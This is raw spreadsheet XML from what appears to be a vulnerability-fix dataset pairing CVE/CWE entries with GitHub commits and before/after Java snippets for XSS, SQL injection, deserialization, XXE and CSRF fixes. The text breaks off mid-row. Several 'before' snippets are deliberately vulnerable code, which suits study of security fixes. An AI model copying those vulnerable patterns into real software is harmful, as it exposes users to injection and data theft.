import com.redhat.rhn.common.util.StringUtil;
import com.redhat.rhn.frontend.context.Context;
        return StringEscapeUtils.escapeHtml("**" + messageId + "**");
</t>
  </si>
  <si>
    <t>1320444 - Bad bean-message ids and navbar-vars can lead to XSS issuesFixed generally in LocalizationService and DialognavRenderer, removed
some attempts at fixing specific locations.</t>
  </si>
  <si>
    <t>DialognavRenderer.java</t>
  </si>
  <si>
    <t xml:space="preserve">import com.redhat.rhn.frontend.html.HtmlTag;
                    formVars.append(currentVar + "=" + values[0]);
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.apache.commons.lang.StringEscapeUtils;
import com.redhat.rhn.frontend.html.HtmlTag;
                    formVars.append(currentVar + "=" +
                             StringEscapeUtils.escapeHtml(values[0]));
</t>
  </si>
  <si>
    <t>https://github.com/spacewalkproject/spacewalk/commit/b6491eba</t>
  </si>
  <si>
    <t>DeleteGroupAction.java</t>
  </si>
  <si>
    <t>b6491eba</t>
  </si>
  <si>
    <t xml:space="preserve">import com.redhat.rhn.domain.server.ManagedServerGroup;
import com.redhat.rhn.frontend.struts.RequestContext;
import com.redhat.rhn.frontend.struts.RhnAction;
import com.redhat.rhn.frontend.struts.RhnHelper;
import com.redhat.rhn.manager.system.ServerGroupManager;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
            String [] params = {serverGroup.getName()};
</t>
  </si>
  <si>
    <t xml:space="preserve">import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.apache.commons.lang.StringEscapeUtils;
import com.redhat.rhn.domain.server.ManagedServerGroup;
import com.redhat.rhn.frontend.struts.RequestContext;
import com.redhat.rhn.frontend.struts.RhnAction;
import com.redhat.rhn.frontend.struts.RhnHelper;
import com.redhat.rhn.manager.system.ServerGroupManager;
    @Override
            String [] params = {StringEscapeUtils.escapeHtml(serverGroup.getName())};
</t>
  </si>
  <si>
    <t>1320452 - Cleaning up some remaining Tag/Group XSS issues</t>
  </si>
  <si>
    <t>CWE-89</t>
  </si>
  <si>
    <t>CVE-2016-4040</t>
  </si>
  <si>
    <t>https://github.com/dotCMS/core/commit/bc4db5d71dc67015572f8e4c6fdf87e29b854d02</t>
  </si>
  <si>
    <t>SubmitWebFormAction.java</t>
  </si>
  <si>
    <t>bc4db5d71dc67015572f8e4c6fdf87e29b854d02</t>
  </si>
  <si>
    <t xml:space="preserve">				invalidCaptchaURL = invalidCaptchaURL.replaceAll("\\s", " ");
</t>
  </si>
  <si>
    <t>fixes #8840 sort by sanitizing and email header injection</t>
  </si>
  <si>
    <t>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')</t>
  </si>
  <si>
    <t>The software constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component.</t>
  </si>
  <si>
    <t>Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. This can be used to alter query logic to bypass security checks, or to insert additional statements that modify the back-end database, possibly including execution of system commands. SQL injection has become a common issue with database-driven web sites. The flaw is easily detected, and easily exploited, and as such, any site or software package with even a minimal user base is likely to be subject to an attempted attack of this kind. This flaw depends on the fact that SQL makes no real distinction between the control and data planes.</t>
  </si>
  <si>
    <t>EmailFactory.java</t>
  </si>
  <si>
    <t xml:space="preserve">				// strip line breaks from headers
				from = from.replaceAll("\\s", " ");
				to = to.replaceAll("\\s", " ");
				cc = cc.replaceAll("\\s", " ");
				bcc = bcc.replaceAll("\\s", " ");
				fromName = fromName.replaceAll("\\s", " ");
				subject = subject.replaceAll("\\s", " ");
</t>
  </si>
  <si>
    <t>WorkflowSearcher.java</t>
  </si>
  <si>
    <t xml:space="preserve">		return orderBy;
</t>
  </si>
  <si>
    <t xml:space="preserve">import com.dotmarketing.common.util.SQLUtil;
		orderBy= SQLUtil.sanitizeSortBy(orderBy);
		return SQLUtil.sanitizeSortBy(orderBy);
		orderBy = SQLUtil.sanitizeSortBy(orderBy);
</t>
  </si>
  <si>
    <t>CVE-2016-4999</t>
  </si>
  <si>
    <t>https://github.com/dashbuilder/dashbuilder/commit/8574899e3b6455547b534f570b2330ff772e524b</t>
  </si>
  <si>
    <t>DefaultDialect.java</t>
  </si>
  <si>
    <t>8574899e3b6455547b534f570b2330ff772e524b</t>
  </si>
  <si>
    <t xml:space="preserve">        return "'" + param + "'";
</t>
  </si>
  <si>
    <t xml:space="preserve">        // DASHBUILDE-113: SQL Injection on data set lookup filters
        String escapedParam = param.replaceAll("'", "''");
        return "'" + escapedParam + "'";
</t>
  </si>
  <si>
    <t>DASHBUILDE-113: SQL Injection on data set lookup filters</t>
  </si>
  <si>
    <t>CWE-94</t>
  </si>
  <si>
    <t>CVE-2013-2035</t>
  </si>
  <si>
    <t>https://github.com/fusesource/hawtjni/commit/92c266170ce98edc200c656bd034a237098b8aa5</t>
  </si>
  <si>
    <t>Library.java</t>
  </si>
  <si>
    <t>92c266170ce98edc200c656bd034a237098b8aa5</t>
  </si>
  <si>
    <t xml:space="preserve">import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
                File target = file(customPath, map(libName));
                if( extract(errors, resource, target) ) {
            File target = file(customPath, map(libName));
            if( extract(errors, resource, target) ) {
    private boolean extract(ArrayList&lt;String&gt; errors, URL source, File target) {
        FileOutputStream os = null;
        InputStream is = null;
        boolean extracting = false;
            if (!target.exists() || isStale(source, target) ) {
                    extracting = true;
                    os.close();
                    is.close();
            try {
                if (os != null)
                    os.close();
            } catch (IOException e1) {
            }
            try {
                if (is != null)
                    is.close();
            } catch (IOException e1) {
            }
            if (extracting &amp;&amp; target.exists())
            return false;
        return true;
    private boolean isStale(URL source, File target) {
        if( source.getProtocol().equals("jar") ) {
            // unwrap the jar protocol...
                String parts[] = source.getFile().split(Pattern.quote("!"));
                source = new URL(parts[0]);
            } catch (MalformedURLException e) {
                return false;
            }
        }
        File sourceFile=null;
        if( source.getProtocol().equals("file") ) {
            sourceFile = new File(source.getFile());
        }
        if( sourceFile!=null &amp;&amp; sourceFile.exists() ) {
            if( sourceFile.lastModified() &gt; target.lastModified() ) {
                return true;
        return false;
</t>
  </si>
  <si>
    <t xml:space="preserve">import java.io.*;
import java.util.Random;
            String []libNameParts = map(libName).split("\\.");
            String prefix = libNameParts[0]+"-";
            String suffix = "."+libNameParts[1];
                File target = extract(errors, resource, prefix, suffix, file(customPath));
                if( target!=null ) {
            File target = extract(errors, resource, prefix, suffix, file(customPath));
            if( target!=null ) {
    private File extract(ArrayList&lt;String&gt; errors, URL source, String prefix, String suffix, File directory) {
        File target = null;
            FileOutputStream os = null;
            InputStream is = null;
            try {
                target = File.createTempFile(prefix, suffix, directory);
                target.deleteOnExit();
                return target;
            } finally {
                close(os);
                close(is);
            if( target!=null ) {
            }
        return null;
    static private void close(Closeable file) {
        if(file!=null) {
                file.close();
            } catch (Exception ignore) {
</t>
  </si>
  <si>
    <t>Simplify shared lib extraction.</t>
  </si>
  <si>
    <t>Improper Control of Generation of Code ('Code Injection')</t>
  </si>
  <si>
    <t>The software constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.</t>
  </si>
  <si>
    <t>When software allows a user's input to contain code syntax, it might be possible for an attacker to craft the code in such a way that it will alter the intended control flow of the software. Such an alteration could lead to arbitrary code execution. Injection problems encompass a wide variety of issues -- all mitigated in very different ways. For this reason, the most effective way to discuss these weaknesses is to note the distinct features which classify them as injection weaknesses. The most important issue to note is that all injection problems share one thing in common -- i.e., they allow for the injection of control plane data into the user-controlled data plane. This means that the execution of the process may be altered by sending code in through legitimate data channels, using no other mechanism. While buffer overflows, and many other flaws, involve the use of some further issue to gain execution, injection problems need only for the data to be parsed. The most classic instantiations of this category of weakness are SQL injection and format string vulnerabilities.</t>
  </si>
  <si>
    <t>CVE-2013-4521</t>
  </si>
  <si>
    <t>https://github.com/nuxeo/richfaces/commit/6cbad2a6dcb70d3e33a6ce5879b1a3ad79eb1aec</t>
  </si>
  <si>
    <t>LookAheadObjectInputStream.java</t>
  </si>
  <si>
    <t>6cbad2a6dcb70d3e33a6ce5879b1a3ad79eb1aec</t>
  </si>
  <si>
    <t xml:space="preserve">/**
 * JBoss, Home of Professional Open Source
 * Copyright 2010, Red Hat, Inc. and individual contributors
 * by the @authors tag. See the copyright.txt in the distribution for a
 * full listing of individual contributors.
 *
 * This is free software; you can redistribute it and/or modify it
 * under the terms of the GNU Lesser General Public License as
 * published by the Free Software Foundation; either version 2.1 of
 * the License, or (at your option) any later version.
 *
 * This software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 License along with this software; if not, write to the Free
 * Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
 * 02110-1301 USA, or see the FSF site: http://www.fsf.org.
 **/
package org.ajax4jsf.resource;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectStreamClass;
import java.util.Collections;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Properties;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;
/**
 * When deserializing objects, first check that the class being deserialized is in the allowed whitelist.
 *
 * @author &lt;a href="http://community.jboss.org/people/bleathem"&gt;Brian Leathem&lt;/a&gt;
 */
public class LookAheadObjectInputStream extends ObjectInputStream {
    private static final Map&lt;String, Class&lt;?&gt;&gt; PRIMITIVE_TYPES = new HashMap&lt;String, Class&lt;?&gt;&gt;(9, 1.0F);
    private static Set&lt;Class&gt; whitelistBaseClasses = new HashSet&lt;Class&gt;();
    private static Set&lt;String&gt; whitelistClassNameCache = Collections.newSetFromMap(new ConcurrentHashMap&lt;String, Boolean&gt;());
    static {
        PRIMITIVE_TYPES.put("bool", Boolean.TYPE);
        PRIMITIVE_TYPES.put("byte", Byte.TYPE);
        PRIMITIVE_TYPES.put("char", Character.TYPE);
        PRIMITIVE_TYPES.put("short", Short.TYPE);
        PRIMITIVE_TYPES.put("int", Integer.TYPE);
        PRIMITIVE_TYPES.put("long", Long.TYPE);
        PRIMITIVE_TYPES.put("float", Float.TYPE);
        PRIMITIVE_TYPES.put("double", Double.TYPE);
        PRIMITIVE_TYPES.put("void", Void.TYPE);
        whitelistClassNameCache.add(new Object[0].getClass().getName());
        whitelistClassNameCache.add(new String[0].getClass().getName());
        whitelistClassNameCache.add(new Boolean[0].getClass().getName());
        whitelistClassNameCache.add(new Byte[0].getClass().getName());
        whitelistClassNameCache.add(new Character[0].getClass().getName());
        whitelistClassNameCache.add(new Short[0].getClass().getName());
        whitelistClassNameCache.add(new Integer[0].getClass().getName());
        whitelistClassNameCache.add(new Long[0].getClass().getName());
        whitelistClassNameCache.add(new Float[0].getClass().getName());
        whitelistClassNameCache.add(new Double[0].getClass().getName());
        whitelistClassNameCache.add(new Void[0].getClass().getName());
        whitelistBaseClasses.add(String.class);
        whitelistBaseClasses.add(Boolean.class);
        whitelistBaseClasses.add(Byte.class);
        whitelistBaseClasses.add(Character.class);
        whitelistBaseClasses.add(Number.class);
        loadWhitelist();
    }
    public LookAheadObjectInputStream(InputStream in) throws IOException {
        super(in);
    }
    /**
     * Only deserialize primitive or whitelisted classes
     */
    @Override
    protected Class&lt;?&gt; resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
        Class&lt;?&gt; primitiveType = PRIMITIVE_TYPES.get(desc.getName());
        if (primitiveType != null) {
            return primitiveType;
        }
        if (!isClassValid(desc.getName())) {
            throw new InvalidClassException("Unauthorized deserialization attempt", desc.getName());
        }
        return super.resolveClass(desc);
    }
    /**
     * Determine if the given requestedClassName is allowed by the whitelist
     */
    boolean isClassValid(String requestedClassName) {
        if (whitelistClassNameCache.contains(requestedClassName)) {
            return true;
        }
        try {
            Class&lt;?&gt; requestedClass = Class.forName(requestedClassName);
            for (Class baseClass : whitelistBaseClasses ) {
                if (baseClass.isAssignableFrom(requestedClass)) {
                    whitelistClassNameCache.add(requestedClassName);
                    return true;
                }
            }
        } catch (ClassNotFoundException e) {
            return false;
        }
        return false;
    }
    /**
     * Load the whitelist from the properties file
     */
    static void loadWhitelist() {
        Properties whitelistProperties = new Properties();
        InputStream stream = null;
        try {
            stream =  LookAheadObjectInputStream.class.getResourceAsStream("resource-serialization.properties");
            whitelistProperties.load(stream);
        } catch (IOException e) {
            throw new RuntimeException("Error loading the ResourceBuilder.properties file", e);
        } finally {
            if (stream != null) {
                try {
                    stream.close();
                } catch (IOException e) {
                    throw new RuntimeException("Error closing the ResourceBuilder.properties file", e);
                }
            }
        }
        for (String baseClassName : whitelistProperties.getProperty("whitelist").split(",")) {
            try {
                Class&lt;?&gt; baseClass = Class.forName(baseClassName);
                whitelistBaseClasses.add(baseClass);
            } catch (ClassNotFoundException e) {
                throw new RuntimeException("Unable to load whiteList class " + baseClassName, e);
            }
        }
    }
}
</t>
  </si>
  <si>
    <t>NXBT-661: apply patch for CVE-2013-4521 flaw</t>
  </si>
  <si>
    <t>ResourceBuilderImpl.java</t>
  </si>
  <si>
    <t xml:space="preserve">					ObjectInputStream in = new ObjectInputStream(
							new ByteArrayInputStream(objectArray));
</t>
  </si>
  <si>
    <t xml:space="preserve">					ObjectInputStream in = new LookAheadObjectInputStream(new ByteArrayInputStream(objectArray));
</t>
  </si>
  <si>
    <t>SerializableResource.java</t>
  </si>
  <si>
    <t xml:space="preserve">/**
 * JBoss, Home of Professional Open Source
 * Copyright 2010, Red Hat, Inc. and individual contributors
 * by the @authors tag. See the copyright.txt in the distribution for a
 * full listing of individual contributors.
 *
 * This is free software; you can redistribute it and/or modify it
 * under the terms of the GNU Lesser General Public License as
 * published by the Free Software Foundation; either version 2.1 of
 * the License, or (at your option) any later version.
 *
 * This software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 License along with this software; if not, write to the Free
 * Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
 * 02110-1301 USA, or see the FSF site: http://www.fsf.org.
 **/
package org.ajax4jsf.resource;
/**
 * A marker interface, used to indicate that the class implementing this interfaces is cleared for deserialisation by
 * the LookAheadObjectInputStream
 *
 * @author &lt;a href="http://community.jboss.org/people/bleathem"&gt;Brian Leathem&lt;/a&gt;
 */
public interface SerializableResource extends java.io.Serializable {
}
</t>
  </si>
  <si>
    <t>UserResource.java</t>
  </si>
  <si>
    <t xml:space="preserve">	public static class UriData implements Serializable {
</t>
  </si>
  <si>
    <t xml:space="preserve">	public static class UriData implements SerializableResource {
</t>
  </si>
  <si>
    <t>MediaData.java</t>
  </si>
  <si>
    <t xml:space="preserve">import java.io.Serializable;
public class MediaData implements Serializable{
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.ajax4jsf.resource.SerializableResource;
public class MediaData implements SerializableResource {
</t>
  </si>
  <si>
    <t>PaintData.java</t>
  </si>
  <si>
    <t xml:space="preserve">import java.io.Serializable;
public class PaintData implements Serializable{
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.ajax4jsf.resource.SerializableResource;
public class PaintData implements SerializableResource {
</t>
  </si>
  <si>
    <t>Paint2DResource.java</t>
  </si>
  <si>
    <t xml:space="preserve">import java.io.Serializable;
	private static final class ImageData implements Serializable {
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.ajax4jsf.resource.SerializableResource;
	private static final class ImageData implements SerializableResource {
</t>
  </si>
  <si>
    <t>CVE-2013-6430</t>
  </si>
  <si>
    <t>https://github.com/spring-projects/spring-framework/commit/7a7df6637478607bef0277bf52a4e0a03e20a248</t>
  </si>
  <si>
    <t>JavaScriptUtils.java</t>
  </si>
  <si>
    <t>7a7df6637478607bef0277bf52a4e0a03e20a248</t>
  </si>
  <si>
    <t xml:space="preserve"> * Copyright 2002-2008 the original author or authors.
 * &lt;a href="http://developer.mozilla.org/en/docs/Core_JavaScript_1.5_Guide:Literals#String_Literals"&gt;
 * Core JavaScript 1.5 Guide
 * &lt;/a&gt;
	 * Turn special characters into escaped characters conforming to JavaScript.
	 * Handles complete character set defined in HTML 4.01 recommendation.
	 * @return the escaped string
</t>
  </si>
  <si>
    <t xml:space="preserve"> * Copyright 2002-2013 the original author or authors.
 * &lt;a href="https://developer.mozilla.org/en-US/docs/JavaScript/Guide/Values,_variables,_and_literals#String_literals"&gt;
 * JavaScript Guide&lt;/a&gt; on Mozilla Developer Network.
 * @author Rossen Stoyanchev
	 * Turn JavaScript special characters into escaped characters.
	 *
	 * @return the string with escaped characters
			else if (c == '\b') {
				filtered.append("\\b");
			}
			// No '\v' in Java, use octal value for VT ascii char
			else if (c == '\013') {
				filtered.append("\\v");
			}
			else if (c == '&lt;') {
				filtered.append("\\u003C");
			}
			else if (c == '&gt;') {
				filtered.append("\\u003E");
			}
			// Unicode for PS (line terminator in ECMA-262)
			else if (c == '\u2028') {
				filtered.append("\\u2028");
			}
			// Unicode for LS (line terminator in ECMA-262)
			else if (c == '\u2029') {
				filtered.append("\\u2029");
			}
</t>
  </si>
  <si>
    <t>Update JavaScriptUtilsAdd escaping for &lt;, &gt;, and PS/LS line terminators
Issue: SPR-9983</t>
  </si>
  <si>
    <t>CVE-2013-6447</t>
  </si>
  <si>
    <t>https://github.com/seam2/jboss-seam/commit/090aa6252affc978a96c388e3fc2c1c2688d9bb5</t>
  </si>
  <si>
    <t>ExecutionHandler.java</t>
  </si>
  <si>
    <t>090aa6252affc978a96c388e3fc2c1c2688d9bb5</t>
  </si>
  <si>
    <t xml:space="preserve">      SAXReader xmlReader = new SAXReader();
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.jboss.seam.util.XML;
      SAXReader xmlReader = XML.getSafeSaxReader();
</t>
  </si>
  <si>
    <t>https://issues.jboss.org/browse/WFK2-375 enhanced fixgit-svn-id: https://svn.jboss.org/repos/seam/branches/enterprise/WFK-2_1@15651 a9c07ecc-ef43-0410-a306-c911db474e88</t>
  </si>
  <si>
    <t>InterfaceGenerator.java</t>
  </si>
  <si>
    <t xml:space="preserve">                 try
                 {
                    Class c = Reflections.classForName(componentName);
                    appendClassSource(response.getOutputStream(), c, types);
                 }
                 catch (ClassNotFoundException ex)
                 {
                    log.error(String.format("Component not found: [%s]", componentName));
                    throw new ServletException("Invalid request - component not found.");
                 }
</t>
  </si>
  <si>
    <t xml:space="preserve">                 log.error(String.format("Component not found: [%s]", componentName));
                 throw new ServletException("Invalid request - component not found.");
</t>
  </si>
  <si>
    <t>PollHandler.java</t>
  </si>
  <si>
    <t xml:space="preserve">    SAXReader xmlReader = new SAXReader();
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.jboss.seam.util.XML;
    SAXReader xmlReader = XML.getSafeSaxReader();
</t>
  </si>
  <si>
    <t>SubscriptionHandler.java</t>
  </si>
  <si>
    <t>XML.java</t>
  </si>
  <si>
    <t xml:space="preserve">   /**
    * Get safe SaxReader with doctype feature disabled 
    * @see http://xerces.apache.org/xerces2-j/features.html#disallow-doctype-decl 
    * @return
    * @throws Exception
    */
   public static SAXReader getSafeSaxReader() throws Exception
   {
      SAXReader xmlReader = new SAXReader();
      xmlReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
      return xmlReader;
   }
</t>
  </si>
  <si>
    <t>CVE-2013-6465</t>
  </si>
  <si>
    <t>https://github.com/kiegroup/jbpm-wb/commit/4818204506e8e94645b52adb9426bedfa9ffdd04</t>
  </si>
  <si>
    <t>TaskDetailsMultiPresenter.java</t>
  </si>
  <si>
    <t>4818204506e8e94645b52adb9426bedfa9ffdd04</t>
  </si>
  <si>
    <t xml:space="preserve">        view.getTaskIdAndName().setText(String.valueOf(selectedTaskId) + " - "+selectedTaskName);
</t>
  </si>
  <si>
    <t xml:space="preserve">import com.google.gwt.safehtml.shared.SafeHtmlUtils;
        view.getTaskIdAndName().setText(SafeHtmlUtils.htmlEscape(String.valueOf(selectedTaskId) + " - "+selectedTaskName));
</t>
  </si>
  <si>
    <t>BZ-1049109: escaping task name html inputs</t>
  </si>
  <si>
    <t>CVE-2013-7250</t>
  </si>
  <si>
    <t>https://github.com/micromata/projectforge-webapp/commit/5a6a25366491443b76e528a04a9e4ba26f08a83c</t>
  </si>
  <si>
    <t>JsonBuilder.java</t>
  </si>
  <si>
    <t>5a6a25366491443b76e528a04a9e4ba26f08a83c</t>
  </si>
  <si>
    <t xml:space="preserve">            sb.append(c);
</t>
  </si>
  <si>
    <t xml:space="preserve">  private boolean escapeHtml;
  /**
   * @param escapeHtml the escapeHtml to set (default is false).
   * @return this for chaining.
   */
  public JsonBuilder setEscapeHtml(final boolean escapeHtml)
  {
    this.escapeHtml = escapeHtml;
    return this;
  }
            if (escapeHtml == true) {
              switch (c) {
                case '&lt;':
                  sb.append("&amp;lt;");
                  break;
                case '&gt;':
                  sb.append("&amp;gt;");
                  break;
                case '&amp;':
                  sb.append("&amp;amp;");
                  break;
                case '"':
                  sb.append("&amp;quot;");
                  break;
                case '\'':
                  sb.append("&amp;#x27;");
                  break;
                case '/':
                  sb.append("&amp;#x2F;");
                  break;
                default:
                  sb.append(c);
              }
            } else {
              sb.append(c);
            }
</t>
  </si>
  <si>
    <t>Escapes now HTML (JsonBuilder).</t>
  </si>
  <si>
    <t>PFAutoCompleteBehavior.java</t>
  </si>
  <si>
    <t xml:space="preserve">    private MyJsonBuilder()
    {
      setEscapeHtml(true);
    }
</t>
  </si>
  <si>
    <t>CVE-2013-7251</t>
  </si>
  <si>
    <t>https://github.com/micromata/projectforge-webapp/commit/422de35e3c3141e418a73bfb39b430d5fd74077e</t>
  </si>
  <si>
    <t>SetupForm.java</t>
  </si>
  <si>
    <t>422de35e3c3141e418a73bfb39b430d5fd74077e</t>
  </si>
  <si>
    <t xml:space="preserve">import org.projectforge.web.wicket.CsrfTokenHandler;
  /**
   * Cross site request forgery token.
   */
  private final CsrfTokenHandler csrfTokenHandler;
    csrfTokenHandler = new CsrfTokenHandler(this);
          csrfTokenHandler.onSubmit();
  @Override
  protected void onSubmit()
  {
    super.onSubmit();
    csrfTokenHandler.onSubmit();
  }
</t>
  </si>
  <si>
    <t>CSRF protection.</t>
  </si>
  <si>
    <t>SetupImportForm.java</t>
  </si>
  <si>
    <t xml:space="preserve">import org.projectforge.web.wicket.CsrfTokenHandler;
  /**
   * Cross site request forgery token.
   */
  private final CsrfTokenHandler csrfTokenHandler;
    csrfTokenHandler = new CsrfTokenHandler(this);
  }
  @Override
  protected void onSubmit()
  {
    super.onSubmit();
    csrfTokenHandler.onSubmit();
</t>
  </si>
  <si>
    <t>SystemUpdateForm.java</t>
  </si>
  <si>
    <t xml:space="preserve">import org.projectforge.web.wicket.CsrfTokenHandler;
  /**
   * Cross site request forgery token.
   */
  private final CsrfTokenHandler csrfTokenHandler;
    csrfTokenHandler = new CsrfTokenHandler(this);
  @Override
  protected void onSubmit()
  {
    super.onSubmit();
    csrfTokenHandler.onSubmit();
  }
</t>
  </si>
  <si>
    <t>NavTopPanel.java</t>
  </si>
  <si>
    <t xml:space="preserve">import org.projectforge.web.wicket.CsrfTokenHandler;
  /**
   * Cross site request forgery token.
   */
  private CsrfTokenHandler csrfTokenHandler;
        csrfTokenHandler.onSubmit();
    csrfTokenHandler = new CsrfTokenHandler(searchForm);
</t>
  </si>
  <si>
    <t>ModalDialog.java</t>
  </si>
  <si>
    <t xml:space="preserve">import org.projectforge.web.wicket.CsrfTokenHandler;
  /**
   * Cross site request forgery token.
   */
  protected CsrfTokenHandler csrfTokenHandler;
        csrfTokenHandler.onSubmit();
    csrfTokenHandler.onSubmit();
    csrfTokenHandler = new CsrfTokenHandler(form);
          csrfTokenHandler.onSubmit();
        csrfTokenHandler.onSubmit();
        csrfTokenHandler.onSubmit();
    csrfTokenHandler.onSubmit();
    csrfTokenHandler.onSubmit();
        csrfTokenHandler.onSubmit();
</t>
  </si>
  <si>
    <t>RechnungCostEditTablePanel.java</t>
  </si>
  <si>
    <t xml:space="preserve">    this.form = new Form&lt;AbstractRechnungsPositionDO&gt;("form");
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.projectforge.web.wicket.CsrfTokenHandler;
  /**
   * Cross site request forgery token.
   */
  private final CsrfTokenHandler csrfTokenHandler;
  @SuppressWarnings("serial")
    this.form = new Form&lt;AbstractRechnungsPositionDO&gt;("form") {
      @Override
      protected void onSubmit()
      {
        super.onSubmit();
        csrfTokenHandler.onSubmit();
      }
    };
    csrfTokenHandler = new CsrfTokenHandler(form);
</t>
  </si>
  <si>
    <t>AbstractMobileEditForm.java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</si>
</sst>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9"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="J1" sqref="J1:J1048576"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="7" max="7" width="23.88671875" style="2" customWidth="1"/>
    <col min="8" max="8" width="22.664062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row>
    <row r="2" spans="1:15" x14ac:dyDescent="0.3">
      <c r="A2" t="s">
        <v>859</v>
      </c>
      <c r="B2" t="s">
        <v>860</v>
      </c>
      <c r="C2" t="s">
        <v>861</v>
      </c>
      <c r="D2" t="s">
        <v>862</v>
      </c>
      <c r="E2" t="s">
        <v>863</v>
      </c>
      <c r="F2" t="s">
        <v>17</v>
      </c>
      <c r="G2" s="2" t="s">
        <v>864</v>
      </c>
      <c r="H2" t="s">
        <v>865</v>
      </c>
      <c r="I2" t="s">
        <v>866</v>
      </c>
      <c r="J2" t="s">
        <v>867</v>
      </c>
      <c r="K2" t="s">
        <v>868</v>
      </c>
      <c r="L2" t="s">
        <v>869</v>
      </c>
      <c r="N2">
        <f>LEN(G2)</f>
        <v>314</v>
      </c>
      <c r="O2">
        <f>LEN(H2)</f>
        <v>869</v>
      </c>
    </row>
    <row r="3" spans="1:15" x14ac:dyDescent="0.3">
      <c r="A3" t="s">
        <v>288</v>
      </c>
      <c r="B3" t="s">
        <v>289</v>
      </c>
      <c r="C3" t="s">
        <v>290</v>
      </c>
      <c r="D3" t="s">
        <v>297</v>
      </c>
      <c r="E3" t="s">
        <v>292</v>
      </c>
      <c r="F3" t="s">
        <v>17</v>
      </c>
      <c r="G3" s="2" t="s">
        <v>298</v>
      </c>
      <c r="H3" t="s">
        <v>299</v>
      </c>
      <c r="I3" t="s">
        <v>294</v>
      </c>
      <c r="J3" t="s">
        <v>295</v>
      </c>
      <c r="K3" t="s">
        <v>296</v>
      </c>
    </row>
    <row r="4" spans="1:15" x14ac:dyDescent="0.3">
      <c r="A4" t="s">
        <v>12</v>
      </c>
      <c r="B4" t="s">
        <v>250</v>
      </c>
      <c r="C4" t="s">
        <v>251</v>
      </c>
      <c r="D4" t="s">
        <v>256</v>
      </c>
      <c r="E4" t="s">
        <v>253</v>
      </c>
      <c r="F4" t="s">
        <v>17</v>
      </c>
      <c r="G4" s="2" t="s">
        <v>257</v>
      </c>
      <c r="H4" t="s">
        <v>258</v>
      </c>
      <c r="I4" t="s">
        <v>255</v>
      </c>
      <c r="J4" t="s">
        <v>21</v>
      </c>
      <c r="K4" t="s">
        <v>22</v>
      </c>
      <c r="L4" t="s">
        <v>23</v>
      </c>
    </row>
    <row r="5" spans="1:15" x14ac:dyDescent="0.3">
      <c r="A5" t="s">
        <v>718</v>
      </c>
      <c r="B5" t="s">
        <v>1216</v>
      </c>
      <c r="C5" t="s">
        <v>1217</v>
      </c>
      <c r="D5" t="s">
        <v>1223</v>
      </c>
      <c r="E5" t="s">
        <v>1219</v>
      </c>
      <c r="F5" t="s">
        <v>17</v>
      </c>
      <c r="G5" s="2" t="s">
        <v>1224</v>
      </c>
      <c r="H5" t="s">
        <v>1225</v>
      </c>
      <c r="I5" t="s">
        <v>1222</v>
      </c>
      <c r="J5" t="s">
        <v>726</v>
      </c>
      <c r="K5" t="s">
        <v>727</v>
      </c>
      <c r="L5" t="s">
        <v>728</v>
      </c>
    </row>
    <row r="6" spans="1:15" x14ac:dyDescent="0.3">
      <c r="A6" t="s">
        <v>12</v>
      </c>
      <c r="B6" t="s">
        <v>1357</v>
      </c>
      <c r="C6" t="s">
        <v>1358</v>
      </c>
      <c r="D6" t="s">
        <v>1359</v>
      </c>
      <c r="E6" t="s">
        <v>1360</v>
      </c>
      <c r="F6" t="s">
        <v>17</v>
      </c>
      <c r="G6" s="2" t="s">
        <v>1361</v>
      </c>
      <c r="H6" t="s">
        <v>1362</v>
      </c>
      <c r="I6" t="s">
        <v>1363</v>
      </c>
      <c r="J6" t="s">
        <v>21</v>
      </c>
      <c r="K6" t="s">
        <v>22</v>
      </c>
      <c r="L6" t="s">
        <v>23</v>
      </c>
    </row>
    <row r="7" spans="1:15" x14ac:dyDescent="0.3">
      <c r="A7" t="s">
        <v>259</v>
      </c>
      <c r="B7" t="s">
        <v>784</v>
      </c>
      <c r="C7" t="s">
        <v>785</v>
      </c>
      <c r="D7" t="s">
        <v>805</v>
      </c>
      <c r="E7" t="s">
        <v>787</v>
      </c>
      <c r="F7" t="s">
        <v>17</v>
      </c>
      <c r="G7" s="2" t="s">
        <v>806</v>
      </c>
      <c r="H7" t="s">
        <v>807</v>
      </c>
      <c r="I7" t="s">
        <v>790</v>
      </c>
      <c r="J7" t="s">
        <v>266</v>
      </c>
      <c r="K7" t="s">
        <v>267</v>
      </c>
      <c r="L7" t="s">
        <v>268</v>
      </c>
    </row>
    <row r="8" spans="1:15" x14ac:dyDescent="0.3">
      <c r="A8" t="s">
        <v>172</v>
      </c>
      <c r="B8" t="s">
        <v>639</v>
      </c>
      <c r="C8" t="s">
        <v>640</v>
      </c>
      <c r="D8" t="s">
        <v>655</v>
      </c>
      <c r="E8" t="s">
        <v>642</v>
      </c>
      <c r="F8" t="s">
        <v>17</v>
      </c>
      <c r="G8" s="2" t="s">
        <v>656</v>
      </c>
      <c r="H8" t="s">
        <v>657</v>
      </c>
